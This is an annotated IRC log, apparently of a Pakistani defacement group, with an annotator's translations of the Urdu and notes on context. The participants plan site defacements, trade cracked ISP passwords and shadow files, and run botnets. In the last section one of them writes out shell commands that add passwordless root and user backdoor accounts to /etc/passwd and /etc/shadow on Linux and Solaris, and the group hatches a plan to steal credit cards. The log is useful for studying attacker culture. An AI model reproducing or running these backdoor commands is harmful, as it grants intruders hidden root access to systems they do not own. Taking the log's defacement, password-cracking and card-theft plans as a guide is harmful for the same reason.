:D1ck :??????
:m4ry :or
:m4ry :dig IN NXT @blah www.haha.heatz.snip.example.net
:m4ry :same thing
:m4ry :make subdomains of subdomains
:m4ry :and keep making different ones
:m4ry :cos sometimes the DNS records get cached
:D1ck :www?
:D1ck :subdomain is snip.example.net
:D1ck :subdomain is snip.example.net
:D1ck :oh
:D1ck :i do
:m4ry :ur authorative over sovg.net?
:m4ry :or whatever
:m4ry :WOL is l33t
:m4ry :they run BSDI
:m4ry :most others here run NT
:m4ry :[root@localhost /root]# dig @radius.wol.net.pk version.bind chaos txt
:m4ry :VERSION.BIND. 0S CHAOS TXT "4.9.7-REL"
:m4ry :LOL
:D1ck :yep
:D1ck :socg
:D1ck :man
:D1ck :U GOT LINUX
:D1ck :?
:D1ck :U GOT LINUX?????????
:D1ck :U GOT LINUX?????????
:D1ck :U GOT LINUX?????????
:m4ry :ur lagging
:m4ry :are u mad
:D1ck :HEATAZ
:D1ck :U I KHI?
:m4ry :i'm sitting in this shithole of a city
:D1ck :and u got LINUX
:D1ck :HAW
:m4ry :with no healthy computer for miles
:D1ck :?
:D1ck :?
:D1ck :hahahaha
:D1ck :well
:D1ck :nxt is starting to suck
:D1ck ::)
:m4ry :i'm getting some flak here
:m4ry :nxt?
:m4ry :why?
:m4ry :works 99% of the time for me :)
:m4ry :SCAN WOL
:m4ry :CLASS B
:m4ry :WOL.NET.PK
:m4ry :FOR NAMED & BSD SHIT
:m4ry :i'm out
:m4ry :my cuz is out of hours (again)
:m4ry :i am indeed, cut-off
:m4ry :LOL
:D1ck :heh
:D1ck :no bots?
:D1ck ::(
:D1ck :'flak'?
:D1ck :heh
:D1ck :i cant own www.example.com
:D1ck :haha this freind's quit message
:D1ck :rofl
:D1ck :ACTION is away: (Auto-Away after 15 mins) [BX-MsgLog On]
:D1ck :J4n3
:D1ck :my babies
:Sp07 :my script is elite now
:Sp07 :hahaah
:D1ck :hahaha
:Sp07 :after I get like 10 more bots
:Sp07 :and like
:D1ck :i am a cool member of diz-crew
:D1ck :HAHAHA
:Sp07 :finish the script
:D1ck :founded by h4r33
:D1ck :./ == welcome
:Sp07 :Co0l
:Sp07 :./
:D1ck ::)
:Sp07 :./
:Sp07 :./
:D1ck :HHEH
:Sp07 :./Sn1p3R
:D1ck :./HEH h4r33
:Sp07 :./DiSeasE
:D1ck :rofl
:D1ck :;)
:Sp07 :./SpITz
:Sp07 :./PhAT6
:D1ck :anyway
:D1ck :~
:D1ck :
:D1ck :
:D1ck :SHUTUP
:D1ck :heh
:Sp07 :oK
:D1ck :
:D1ck :_
:Sp07 :_
:J4n3 :(_|_)
:Sp07 :0 \/\/4
:J4n3 :(*Y*)
:D1ck :heh
:D1ck :WHO WILL SEXOR ME
:D1ck :?
:Sp07 :my dog will
:J4n3 :8==D
:J4n3 :lol
:D1ck :dude
:Sp07 :doggy style
:D1ck :i dont like dogs
:D1ck ::(
:Sp07 :ok
:D1ck :EVERY ONE TYPE control + a
:D1ck :EVERY ONE TYPE control + S
:D1ck :EVERY ONE TYPE control + S
:D1ck :in linux
:D1ck ::)
:D1ck :PHAT6
:D1ck :Tota1KaaS
:J4n3 :i'm on w1nbl0w5
:Sp07 :PHAT6
:D1ck :inetd-s
:D1ck :inetd-s
:D1ck :anker
:D1ck :CyneX
:D1ck :w00p
:Sp07 :metoo
:Sp07 : control + a
:Sp07 : control + S
:Sp07 : control + S
:Sp07 :control ass
:D1ck ::)
:D1ck :hi
:D1ck :J4n3: i`m trying www.example.com and www.example.com
:J4n3 :any luck so far ?
:D1ck :but cant own it
:D1ck :ACTION wonders
:D1ck :i`m trying.
:D1ck :nopes
:D1ck :well
:J4n3 :hmm
:D1ck :J4n3
:D1ck : /dcc send d1ck cracked.example.txt
:D1ck ::P
:J4n3 :hahah if only the KESC people would let us get anything done
:J4n3 :by the way, hey, is this really example's file ?
:Sp07 :uhh you like sending things to yourself?
:Sp07 :hehe
:D1ck :ofcourse
:D1ck : by the way, hey, is this really example's file ?
:D1ck :?
:Sp07 :by the way, hey, is this really example's file
:D1ck :why not ?
:D1ck :it is example's file
:D1ck :HAHAHAHHA
:D1ck :Sp07: shutup, were speaking urdu
:J4n3 :one came out, user : nycop pass : 1955
:D1ck :heh
:J4n3 :didn't work
:Sp07 :kesc ye karnay kee tho waqayee
:D1ck :k
:J4n3 :lol
:D1ck :;P
:J4n3 :Sp07 speakin urdu wow
:Sp07 :yup
:Sp07 :chala
:D1ck :hahah
:D1ck :LOL
:D1ck :Sp07 motherfucker
:D1ck :asshole
:D1ck :son of a whore ...
:Sp07 :you
:Sp07 :kay chootiyay madr
:D1ck ::P
:D1ck :?
:D1ck :HAHAHAHAH
:J4n3 :hahahha
:J4n3 :pimp
:D1ck :lol
:Sp07 :YES YES
:D1ck ::)
:Sp07 :VERY GOOD
:D1ck :ACTION fingers Sp07 wet pussy
:Sp07 :oh yeah
:Sp07 :ACTION fingers d1ck dry pussy
:D1ck :jane listen, do sadmind and ttdb on .in
:D1ck :deface
:Sp07 :deface my dick
:D1ck :dude
:D1ck :i would
:D1ck :but
:D1ck :problem
:D1ck :is
:Sp07 :I know I know
:Sp07 :too small
:Sp07 :FUK U
:D1ck :that
:D1ck :u
:D1ck :dont
:D1ck :have
:D1ck :1
:D1ck ::(
:Sp07 :ACTION pulls of dick
:Sp07 :ACTION shoves dick in d1cks face
:Sp07 :ACTION puts dick back on
:D1ck :haha
:D1ck :OH
:D1ck :NOW THATS FLEXIBLE
:D1ck :J4n3
:D1ck :he thinks i am a fed
:D1ck :fbi
:Sp07 :fBi
:D1ck :fBi.gOV
:Sp07 :uhh
:Sp07 :thats my server
:Sp07 :fBi.GoV
:Sp07 :DiSeAsE.fBi.GoV
:D1ck :LAILA
:D1ck :P00P
:D1ck :J4n3
:Sp07 :you guys live near each other?
:D1ck :yep
:D1ck :he's my anal partner
:D1ck :
:D1ck ::)
:D1ck :and some times we do 3some
:D1ck :heh
:Sp07 :he
:Sp07 :heh
:Sp07 :POLICE OUTSIDE MY HOUSE
:Sp07 :let me go get my gun
:Sp07 :jk hehehe
:Sp07 :did you deface onghome.com
:D1ck :no
:Sp07 :deface yahoo.com
:D1ck :its not my box
:D1ck :J4n3
:Sp07 :and people will respecty ou
:Sp07 :hehe
:D1ck :J4n3 s
:D1ck :heh
:D1ck :i mostly do indian sites
:Sp07 :www.india.com
:Sp07 :orsomethign
:Sp07 :ehe
:Sp07 :somethinf famous
:Sp07 :like whitehouse.gov
:nohup :hey look at my ip
:nohup :i am a kewl bot
:nohup :should i deface this?
:Sp07 :no
:Sp07 :yeah
:Sp07 :you should deface it then delete everything
:Sp07 :and when they get it back up
:Sp07 :hack it again
:D1ck :i patched it
:D1ck :but i will depatch it
:D1ck :J4n3
:D1ck :where are u when i need u
:D1ck :where are u when i need u
:D1ck :where are u when i need u
:Sp07 :with another man
:D1ck :lol
:D1ck :J4n3
:D1ck : /wi nohup
:D1ck :fuck
:D1ck :where are u
:D1ck :d4v3
:J4n3 :D1ck
:J4n3 :here
:D1ck :i am defacing mail.example.com
:D1ck :k?
:D1ck :K
:D1ck :?
:D1ck :?
:D1ck :?
:J4n3 :hmm
:D1ck :?
:J4n3 :now ?
:J4n3 :u mean defacing now ?
:D1ck :yep?
:D1ck :we can deface and fix the index after attrtion mirrors
:D1ck :and when they will email i`ll deleted their mail from rdm database
:J4n3 :oh
:J4n3 :okay
:D1ck :?
:D1ck :wana do it?
:J4n3 :actually I was going to sleep, shall we do it tomorrow ???
:D1ck :ok
:D1ck ::(
:D1ck :hehe
:J4n3 :if u want now, then ok
:D1ck :we'll do it tomorrow
:J4n3 :I'm going to bed :)
:D1ck :cya
:J4n3 :?
:D1ck :;)
:D1ck :take care
:J4n3 :heh okies thanx
:J4n3 :your sister-in-law has woken up and is yelling at me
:J4n3 :now go to sleep
:J4n3 :and i'm feelin horny too :P
:J4n3 :errrrr
:J4n3 :see ya
:J4n3 :g0ne
:D1ck ::P
:J4n3 ::)
:D1ck :hehehe
:D1ck :cya
:D1ck ::)
:D1ck :ACTION is away: (Auto-Away after 15 mins) [BX-MsgLog On]
:Sp07 :yo d1ck
:D1ck :?
:D1ck :brb
:D1ck :trojaning boxens
:D1ck :heh
:Sp07 :send me some sun5.7 exploits
:Sp07 :local
:Sp07 :just wanna root this box and thats all
:Sp07 :hehe
:D1ck :i dont have it
:Sp07 :uhhhh
:Sp07 :you dont have any?
:D1ck :brb
:D1ck :nope
:D1ck :ACTION is away: (bbiab) [BX-MsgLog On]
:Sp07 :scala% id
:Sp07 :uid=502(kasidit) gid=10(staff)
:Sp07 :uhh you suck
:Sp07 :nohup?
:D1ck :back
:D1ck :.add D1ck * D1ck 100 1 4
:D1ck :.save
:Sp07 :.add Sp07 too
:Sp07 :=D
:D1ck :okie
:Sp07 :.add Sp07 * Sp07 100 1 4
:D1ck :.add Sp07 #k1dd13 Sp07 70 1 4
:Sp07 :hwhwhw
:D1ck :heh
:D1ck :.save
:Sp07 :.up
:Sp07 :.up
:D1ck :____p____ nick in-gov
:Sp07 :woho
:D1ck :___up____ nick nutsack
:D1ck :nohup3309 nick domestic
:D1ck :nohup6607 nick hostile
:D1ck :nohup6607 nick peniswise
:Sp07 :nohup6607 nick blowjob
:Sp07 :hehe
:D1ck :nohup6607 nick blowjob
:D1ck :nohup8585 nick blowjob
:Sp07 :theres no passwords?
:D1ck :nohup7911 nick graz
:D1ck :graz nick graz-at-
:D1ck :nohup_ nick dig-ns
:Sp07 :nohup___ nick nutsac
:D1ck :nohup____ nick [shit]
:D1ck :_ohup____ sexfig
:D1ck :.add D1ck * D1ck 100 1 4
:D1ck :.save
:Sp07 :nohup__ nick slut
:Sp07 :nohup__ nick ms-whore
:D1ck :nohup__ nick slut
:D1ck :nohup__ nick ms-whore
:D1ck :.q
:D1ck :_ohup____ nick crackX
:D1ck :%_ohup____ nick whoami
:D1ck :__hup____ nick uname-a
:D1ck :nohup_ nick nig
:D1ck :nohup__ nig die
:D1ck :nohup___ nick ms-sin
:D1ck :nohup__ nick hornkiten
:D1ck :nohup8815 nick identd
:D1ck :.save
:D1ck :.add D1ck * D1ck 100 1 4
:D1ck :.save
:D1ck :jej
:D1ck :nohup userlist
:D1ck :fuck
:D1ck :ACTION is away: (Auto-Away after 15 mins) [BX-MsgLog On]
:Sp07 :autoop?
:D1ck :yeo
:Sp07 :.say hi
:D1ck :yep
:Sp07 :.help
PRIVMSG Sp07 :DCC CHAT CHAT 2886730091 32847
:Sp07 :damn thats a lot of bots
:D1ck :dos_ nick ARGV1
:D1ck :i have 70+
:D1ck :glined
:D1ck :and 42+ down
:D1ck ::?(
:D1ck : t mail.examplea.com 1080
:D1ck :Trying 192.168.103.131...
:D1ck :Connected to mail.example.com.
:D1ck :Escape character is '^]'.
:D1ck :HAHAHAAHA
:D1ck :dziasta uses wingate
:D1ck :now
:D1ck :LOL
:Sp07 :?
:Sp07 :heh
:D1ck :rofl
:D1ck :err VeNoMouS
:D1ck :is
:D1ck :a
:D1ck :u33r
:D1ck :qu33r

=-= Day 11 June 14

:J4n3! :D1ck
:J4n3! :moi back :p
:D1ck! :yo
:D1ck! :i owned mar1s
:D1ck! :the real server
:D1ck! :and uploaded their radius log
:D1ck! :bur
:J4n3! :mar1s ?
:D1ck! :but they are encrypted unlike satnet
:D1ck! ::(
:D1ck! :mars.example.net
:J4n3! :ohhh
:D1ck! :give me a ip
:J4n3! :then ? what's the result ?
:D1ck! :i`ll tell the user name
:D1ck! ::)
:J4n3! :wait
:D1ck! :k
:J4n3! :hehe no example users online
:D1ck! :lol
:J4n3! :dude, the passwords coming out of example's /etc/passwd aren't working :/
:D1ck! :;P
:D1ck! :wana deface mail.example.com [Saumil's note: example is a standard Indian greeting... example.com is an Indian site that delivers Indian gifts to the US]
:D1ck! :or we should wait?
:D1ck! :kewl
:D1ck! ::)
:D1ck! :hey
:D1ck! :i have example's personal date in MY COMPUTER [note: "date" is probably a typo for data]
:D1ck! :over 50 MB
:D1ck! :AHAHAHAHAH
:D1ck! :all khawar nehal's work
:D1ck! :inmy pc
:D1ck! :LOL
:J4n3! :haha tight
:J4n3! :yo, let's deface them
:D1ck! :he's 'OK'
:D1ck! :oki
:J4n3! :but dude why aren't these passwords working :?
:D1ck! :?
:J4n3! :the pass from that shadow file :
:D1ck! :don't know, pal
:J4n3! :they r fresh, they should work, right?
:D1ck! :;P
:D1ck! :?
:D1ck! :hey brb rebooting to win
:D1ck! :brb
:J4n3! :kkz
:D1ck! :J4n3
:D1ck! :there?
:D1ck! :ACTION is away: (Auto-Away after 15 mins) [BX-MsgLog On]
:J4n3! :D1ck
:J4n3! :D1ck
:J4n3! :lets deface
:J4n3! :wow
:J4n3! :mera jooota hai japani , ye pathloon englistaani , sir pay laaal topi rooosi phir bee dil hai balochistani :p [Note: lines from a popular hindi movie song, except at the end he says my heart is Baluchistani. Baluchistan is a province in Pakistan.]
:J4n3! :chunari chunari [note: chunari = veil]
:J4n3! :.up
:netro! :3 days 14:51:23time
:PHAT! :4 days 13:45:02time
:J4n3! :D1ck
:D1ck! :J4n3
:D1ck! :dude my mouse slot isn't working
:D1ck! :i am mouseless
:D1ck! ::(
:J4n3! :lol
:J4n3! :how ?
:J4n3! :is the port broken ?
:D1ck! :yep
:D1ck! :port
:D1ck! :ps/2
:D1ck! :ttys0 is modem
:D1ck! :it's the mouse's port, but the modem works
:D1ck! :KHAWAR NEHAL IS GAY [note from Saumil: Khawar Nehal is a guy's name, and a quick Google search on him turned this up in one of the pages: Subject: Research on ISP ? From: Khawar Nehal Date: Sat, 13 Nov 1999 13:35:12 +0500 (PKT) X-Message-Number: 4 What would you like to know ? ISP as in Internet SERVICE Provider is an extremely large number of SERVICES from trying to replacing broken coffeecup holders for customers sitting in the 'dark' to setting up creating your own gateways and routers so that your network stays up under DOS attacks. Thank You. --end of note]
:D1ck! :I OWN HIM
:D1ck! :HAHAHAHAHAHAA
:D1ck! :HGOT 0 SECURITY SKILL1
:J4n3! :hahahah yeah
:J4n3! :in security he is Zero
:J4n3! :i told u before
:D1ck! :yeo
:D1ck! :://
:J4n3! :u owned example again ?
:D1ck! :well
:D1ck! :i lost ns1 and mail
:D1ck! :but i owned mars
:D1ck! :but i dunno if i still have
:J4n3! :He He
:J4n3! :dude i have 800 + password of paknet, but not of karachi,
:J4n3! :and they aren't working here :(
:D1ck! :they close 21 22 23 513
:D1ck! ::(
:D1ck! :reb.tar.gz == MASS win9.x reboot
:D1ck! :by D1ck
:D1ck! :oh
:D1ck! :kewl
:D1ck! :send me the file
:D1ck! :hehe
:J4n3! :3 different files 1 of quetta, pishwar and gujrawala, right now cracking fasialbad [note from Saumil: quetta, peshawar, gujrawala and faisalabad are cities/provinces in Pakistan; so is multan]
:J4n3! :multan is still pending
:J4n3! :should i send?
:D1ck! :?
:D1ck! :yp
:D1ck! :yep
:D1ck! :send
:D1ck! :
:D1ck! ::P
:J4n3! :wait
:D1ck! :okies
:D1ck! :dokies
:D1ck! :hey where are j0e's botS?
:J4n3! :his server is down, someone did some abuse or a DoS attack on him
:D1ck! :shit
:D1ck! :finished?
:J4n3! :yup
:J4n3! :these are 3 files, the other 2 are still remaining
:D1ck! :hey
:D1ck! :oh
:D1ck! : i would like to meet you
:D1ck! : to have a c0ke [note from saumil: dont know what this hritk is]
:J4n3! : I would like to meet you and have sex with you
:D1ck! : hrtik
:D1ck! :hahahaha
:D1ck! : find me with c0ke
:D1ck! :what stupid add
:D1ck! :haha
:J4n3! :heh
:J4n3! :hey send me that bnc file of phycoid
:J4n3! :phsycoid
:D1ck! :?
:D1ck! :oki
:D1ck! :wait
:J4n3! :k
:J4n3! ::)
:D1ck! :dont distro
:J4n3! :hehe nope
:D1ck! :errrrrr
:D1ck! :too many ping timeouts
:J4n3! :yeah
:D1ck! :WONDER jump austin.tx.us.undernet.org
:D1ck! :quit
:J4n3! :fuck
:m4ry! :.say hi
:m4ry! ::/
:m4ry! :jupe?
:m4ry! :ur guys are juping DEAThaces?
:Sp07! :.up
:Sp07! :.up
:m4ry! :hey dis
:Sp07! :hy
:Sp07! :hey
:D1ck! :sup
:D1ck! :J4n3
:D1ck! :J4n3
:J4n3! :D1ck
:D1ck! :sup?
:D1ck! :i have to go today :(
:D1ck! :for mouse
:J4n3! :nuff much just cracked fsd paknet, 691 paases lol
:J4n3! :oh
:J4n3! :yeah mouse is important
:D1ck! :kewl
:D1ck! : /dcc send d1ck cracked.txt
:D1ck! :heh
:J4n3! :heeh wiat
:D1ck! :ki
:D1ck! :hehe
:D1ck! :coool
:D1ck! :man crack zoooooooooooooom
:D1ck! :man crack zoooooooooooooom
:J4n3! ::p
:D1ck! :;p
:D1ck! :where woul those passwords work?
:J4n3!
:yaar uskay pass kaam he nahi kar rahay plus abee lagatha hon phir say usko, deko agar listh na jayen tho kal tho hojayega dude his passwords are not working at all. seems like let's check him out again, see if the list doesnt go through then it will be done by tomorrow :D1ck! :woul=would. :D1ck! :oh okin :D1ck! ::P :J4n3! :yaar ye samaj main nahi aaraha, in their website they says its romaing in paknet dude i cant understand this - in their website it says it is roaming in Paknet :D1ck! :roaming/. :D1ck! :? :J4n3! :roaming yeah, like u use account all over in pakistan like comsats :D1ck! :oh :D1ck! :do u put username@khi? :D1ck! :in comsats :D1ck! :u do that :J4n3! :nope try kiya :J4n3! :nahin horaha doesnt happen :J4n3! ::/ :D1ck! :oh :D1ck! ::/ :J4n3! :i tried of quetta only :J4n3! :ther aren't workin :D1ck! :oki :D1ck! :call them and ask :J4n3! :yeah i told Rsnake to call them and ask :D1ck! :'Hi main quetta say hooon :D1ck! :'Hi main quetta say hooon Hi I am from Quetta. You sister-fucker, I cant connect Hi I am from Quetta. You sister-fucker, I cant connect :D1ck! :oh :J4n3! :LOOL :D1ck! :hehe :J4n3! :haha dekho aaj pooctha hon us say, agar usnay nahi kiya call tho main karkay poochonga haha see today i will ask him, if he doesnt call, then i will do it and ask him again :D1ck! :oye is rsnake online? :D1ck! :oki :J4n3! :nahin not now nahin = no :D1ck! :oh :J4n3! :yaar that psyBNC is cooooooooooooooooool :J4n3! :tight tight :D1ck! :u know what modem he has? :J4n3! :it rox :D1ck! :for linux? :D1ck! :hehe :D1ck! :psyBNC :D1ck! :r0x :J4n3! :hmm he told me , its not zoltrix kuch ajeeb saa naam ahi hmm he told me, it is not zoltrix. some really weird name :D1ck! :ok :D1ck! :MINE SUCKS :D1ck! :$#%#$%#&^%$# :D1ck! :d4v3 :D1ck! :i want to register www.k1dd13-online.org :D1ck! :hmmm :J4n3! :hmm :J4n3! :registeration dotster.com :D1ck! :gimme some GOOD server :J4n3! :cooool :J4n3! :bu :J4n3! :but :D1ck! :? :J4n3! :i think register plus host to somewhere :D1ck! 
:yea :D1ck! :tell me some good server, that wuld host it? :J4n3! :there r many good servers but question is , i doubt if they host hacking site or not :D1ck! :oh :D1ck! :shit :D1ck! :i lost :D1ck! :mars :J4n3! :yeah thats the problem :J4n3! :shit :D1ck! :;p :D1ck! :but i knew i would :J4n3! :lol :J4n3! :how ? :D1ck! :HAHHHAHAAHAA :D1ck! :they reinstalled linux :D1ck! :its still vulneable :D1ck! :LOL :D1ck! :HAHAHAHAHAHAHAHAHAH :D1ck! :they reinstalled all 3 boxes :D1ck! :ROFL :J4n3! :lol :D1ck! :;p :D1ck! :i`ll hack all again' :J4n3! :u mean still vulnerable by ? bind ? :D1ck! :eYe OwN KHaWaR NeHaL :D1ck! :my brother sed 'nehal is a very proud person and he sucks' :D1ck! :yeah :J4n3! :yaar waiasy banda proudy nahin hai, kush ikhlaaq banda hai dude that way the guy isnt a proudy (slang: stuck up) chap ....seems to be a down to earth chap :J4n3! :example ka naveed admin hai , wo bara proudy hai he sux example's admin is naveed. he's really proudy - he sucks :D1ck! :yaar :D1ck! : weell i u dont take my coure u can never suceeeed in ISP bussiness [Note: seems this k. nehal guy seems to be teaching courses on how to set up ISPs] :D1ck! : fuck off :J4n3! :lol :D1ck! :hehe :J4n3! :humsay tho bauth acha raha hai , meri us say dosthi be hogayee thee kaafi he's been good to us. i developed a good friendship with him too :D1ck! : i made all isps successful :J4n3! :ek do marthaba ghar bee drop kiya tha usay a couple of times i had even visited his house :D1ck! :kewl :D1ck! :how much money did he take? :D1ck! :700 or 7000 :D1ck! :? :D1ck! :for modewl 1 :J4n3! :dunno how much personally but i think less then 5000 :D1ck! :oh :D1ck! :tell him to school us :D1ck! :hehe :J4n3! :karlega, wait will have it done, wait :J4n3! :i got one of his email about his courses, shall i forward it to u ? :D1ck! :yaar its so far for me :/ :D1ck! :yep :D1ck! :forward :D1ck! :cr15@hotmail.com and dynamic@example.org (yUCK_ :D1ck! :) :D1ck! ::) :J4n3! :wait :D1ck! :ok :J4n3! :Course outline : :J4n3! 
:Introduction :J4n3! :History :J4n3! :X windows Setup :J4n3! :Dialup Networking :J4n3! :Ethernet Networking :J4n3! :TCP/IP :J4n3! :SMB :J4n3! :Sendmail Mail server :J4n3! :Apache Web Server :J4n3! :Applixware :J4n3! :DNS Server :J4n3! :NFS :J4n3! :Sound Card Configuration :D1ck! :errrrr :D1ck! :i know all that. :D1ck! :is that it? :D1ck! :heh :J4n3! :that is for first module i think :D1ck! :oh :D1ck! :*sigh* :D1ck! :*sigh* :D1ck! :www.example.com :D1ck! :hahaha :J4n3! :ok sent :) :D1ck! :www.example.com :D1ck! :all indian ns :D1ck! :lol :D1ck! :thx :J4n3! :wow :J4n3! :kool :J4n3! :yaar ye defacement ab tight hogee dude this defacement will now become tight. :D1ck! :yep :D1ck! :so sup? :D1ck! :naveeed ko example ka pata laga? has naveed figured out about example? :D1ck! :haha :J4n3! :yup :J4n3! :bataya mainay yup, i had told him :D1ck! :oye :D1ck! :where did u send :D1ck! :dynamic@example.org? :J4n3! :both :D1ck! :k dint get it yet / :D1ck! ::/ :Sp07! :.say a :Sp07! :dos help :Sp07! :. :D1ck! :=) :D1ck! :i had a bot :D1ck! :with uptime of 90 days :D1ck! :but on fine morning :D1ck! :i was sitting :D1ck! :and he/she pinged :D1ck! :and never came back ): :Sp07! :sup :Sp07! :[Sp07@raptorshells Sp07]$ uptime :Sp07! : 9:23pm up 103 days, 8:37, 1 user, load average: 1.00, 1.00, 1.00 :Sp07! :my friends shell :D1ck! :thats nothing dude :D1ck! :dude :D1ck! :i has a box at netkonnect :D1ck! :uptime ws 630 days :D1ck! :thats like 2 years :Sp07! :heh :D1ck! :heh :D1ck! :dude :D1ck! :dis :D1ck! :look for 8.1.2 overflow for me pls :D1ck! :THANKS :Sp07! :? :J4n3! :.msg |sanam| Sanammmmmmmmmm :) PRIVMSG |sanam| :Sanammmmmmmmmm :) :J4n3! :.join #d4v3 :J4n3 :J4n3 :|sanam| :J4n3 :J4n3 :|sanam| are these all :|sanam| your bots? :J4n3 yes all these are mine :) :J4n3 these are too few :J4n3 all the other poor bots are down :J4n3 :J4n3 awww... has it gone this far? :|sanam| who? :|sanam| who? :J4n3 you and who? :|sanam| :|sanam| :J4n3 sir.... 
:J4n3 express your desire :|sanam| you keep one for pinging :J4n3 ok as you wish master :J4n3 you shall receive one for pinging by tomorrow :|sanam| -=- Day 12 June 15 :|S4n4m| :tum aisey hi bolna Just keep on saying like this :|S4n4m| :karna kuch nahi dont do anything :J4n3 :ye baath hai ? is that the deal? :|S4n4m| :han yes :|S4n4m| :yeh bat hay that is the deal :J4n3 :ping bot aaraha hai the ping bot is coming :|S4n4m| :instooooooooooooooooooooo :|S4n4m| ::) :|S4n4m| :karachi mey aooo come to karachi :J4n3 :ok bot aagaya ok the bot is here :J4n3 :d3s|r3 hai uska nick it's nick is d3s|r3 :J4n3 :ab main channel par tyep karo ping me now type in the main channel in ping (Note:: dont know what it translates to) :J4n3 : PiNG THiNGiE - hiall's ping reply took 13 seconds :|S4n4m| :hmmm :|S4n4m| :tahnks :J4n3 :dekha ? saw that? :J4n3 :ab khush ? now are you happy? :|S4n4m| :han yes :|S4n4m| :kush happy :J4n3 :bus thum khush raho :) that's all ... keep staying happy :) :|S4n4m| :wah cool :|S4n4m| :kya bat hay app ki what shall i say about you :|S4n4m| :wasey :|S4n4m| :mey ney ek bandha rakh leeya hay i have kept one system for myself :|S4n4m| :ping key leyya for pinging :J4n3 :thumara bandaa 24 hour nahin betay gas your system wont be for 24 hours (Note:: again i am having difficulty translating - grammar issues in urdu) :J4n3 :mera bot hoga my bot will :|S4n4m| :hmmmmmmmmmm :|S4n4m| :instoo :|S4n4m| :zara 5 min key leyee for a little bit... 5 mins :|S4n4m| :karachi channel per on karachi channel :|S4n4m| :flori ka interview ley loo take flori's interview :|S4n4m| :mey ney appoint kya hay i have appointed (him/her?) :J4n3 :hahaha nahin thum khud hee laylo yes yes, but take it yourself (the interview) :|S4n4m| :kyon why?
:|S4n4m| :tum yahn key op hoo you are the op here :|S4n4m| :admintration mey hoo i am in administration :J4n3 :op thum oh main co-founder hon you are the op, i am the co-founder :J4n3 :aaayee meraa dil......chua kay lagyeeee...churanay wali meri qaatil ohhh.... she stole my heart :|S4n4m| :han wohi hii yes, her :|S4n4m| :hello :|S4n4m| :kya hoa what happened? :J4n3 :wait :J4n3 :.up :J4n3 :.op netra :J4n3 :.op Ott0 :Dew :Hey J4n3 u there ? :J4n3 :.host add J4n3 * :J4n3 :.up :J4n3 :OngHome esay $uptime :D1ck :J4n3 :D1ck :i`m getting my own server;) :D1ck :J4n3 :D1ck :J4n3 :J4n3 :D1ck :J4n3 :i'm here :D1ck :hehe :D1ck :J4n3 :J4n3 :hehe :J4n3 :D1ck :D1ck :oye give me those commands for linux password adding and sun adding re ro re r i gave u :D1ck ::P :D1ck :i lost mine :J4n3 :wait :D1ck :and i dont wana make again :J4n3 :cp /etc/passwd /etc/.tp; :J4n3 :echo "ro::99999::::::" >> /etc/shadow; :J4n3 :echo "r::99999::::::" >> /etc/shadow; :J4n3 :echo "ro:x:500:1000::/:/bin/bash" >> /etc/passwd; :J4n3 :echo "r:x:0:0::/:/bin/bash" >> /etc/passwd; :J4n3 :cp /etc/shadow /etc/.ts; :D1ck :k :J4n3 ::p :D1ck :and suhn :D1ck :? :D1ck :sun :D1ck :? :J4n3 :wait :D1ck :gimme sun tew :D1ck :k :J4n3 :cp /etc/passwd /etc/.tp; :J4n3 :echo "re::6445::::::" >> /etc/shadow; :J4n3 :echo "r::10891::::::" >> /etc/shadow; :J4n3 :echo "re:x:500:1000:daemon:/:/sbin/sh" >> /etc/passwd; :J4n3 :echo "r:x:0:0:User:/:/sbin/sh" >> /etc/passwd; :J4n3 :cp /etc/shadow /etc/.ts; :D1ck :thx :J4n3 :np :p :D1ck :oye :D1ck :me getting a box :D1ck :T+3 :D1ck :T3 :J4n3 :wow :J4n3 :kewl :D1ck :where should i get? :D1ck :where is j0e getting :D1ck :d4v3 i want the folling domains :J4n3 :folling ? (Note:: misspelt "following") :D1ck example.org :J4n3 :j0e say contact nahi huwa called him 2 times j0e said there has been no contact ... 
called him 2 times :D1ck :wetcunts.net :J4n3 :example hmm :J4n3 :mil jayega agar register nahi huwa hai tho we will get it if it has not been registered :D1ck :undefined.net :D1ck :and kewl ones :D1ck :but not one's that end with zzz :D1ck :like dreamzzz.net :D1ck :etc :D1ck :eeet.org :D1ck :eeet.net :D1ck :oye :D1ck :how much j0e paid :D1ck :and what server? :J4n3 :he paid 250 $ :J4n3 :from example.net :D1ck :kewl :D1ck :for a T3? :J4n3 :and yeah example.org and com net all available :p :J4n3 :T1 i think :D1ck :kewl :D1ck :get me please :D1ck :oh :J4n3 :yaar CC :( :J4n3 :no CC right now :J4n3 :yaar u have that bind weapon why dont u hit a big shoping site and take cc's ? (Note:: here's where they hatch the idea of stealing CCs) :D1ck :yep :D1ck :oki :D1ck : welp why dont we all hang in :D1ck :it was my channel and i think ti still is :J4n3 :abay yaar sub fraud hotha hai wahan par hey dude, a lot of fraud goes on there :J4n3 :their CC's do not work :D1ck :hehe :J4n3 :bauth try kiya hai undernet and effnet par tried a lot on undernet and effnet :D1ck :k :D1ck :heh k :D1ck : DIGITALINET offers quality web hosting staring at 6$ a :D1ck : month. Signup for webhosting with digitalinet and get your :D1ck : domain for 11$ a year :D1ck : information. :D1ck :i`ll buy 2 legit domains there :J4n3 :haha i had a shell from there :D1ck :kewl :J4n3 :they closed shell service now :J4n3 :adult web hosting :p :D1ck :lol :J4n3 :service achee thee buree nahin thee the service was good, not bad at all :D1ck :haha :J4n3 :oye sex time :J4n3 :brb :J4n3 :br :J4n3 :bbl :J4n3 :shayed so gaya seems like he's gone to sleep :D1ck :ahahahha :J4n3 :hehe :J4n3 :g0ne :D1ck :.join :L4stly :Does anyone here have any working Credit Card numbers with full details ? :L4stly :Does anyone here have any working Credit Card numbers with full details ? :L4stly :Does anyone here have any working Credit Card numbers with full details ? 
:L4stly :Does anyone here have any working Credit Card numbers with full details ? :L4stly :Does anyone here have any working Credit Card numbers with full details ? :L4stly :Does anyone here have any working Credit Card numbers with full details ? :^w1nX^ :cc :^w1nX^ :cc :^w1nX^ :sleepin chann :^w1nX^ :trade :^w1nX^ :sleepin chann :^w1nX^ :ping me :^w1nX^ :ping me :^w1nX^ :ping me :^w1nX^ :trade :atlanta.ga.us.undernet.org 005 spitz SILENCE=15 WHOX WALLCHOPS USERIP CPRIVMSG CNOTICE MODES=6 MAXCHANNELS=15 MAXBANS=30 NICKLEN=9 TOPICLEN=160 KICKLEN=160 MAP :are supported by this server :^w1nX^ :ping me :^w1nX^ :ping me :^w1nX^ :ping me :^w1nX^ :ping me :^w1nX^ :ping me :^w1nX^ :ping me :nirvana19 :e cinevA de aici si pe rocarding? is anyone from here on rocarding too? (Note:: definitely not urdu here) :^w1nX^ :ping me :^w1nX^ :ping me :^w1nX^ :ping me :^w1nX^ :ping me 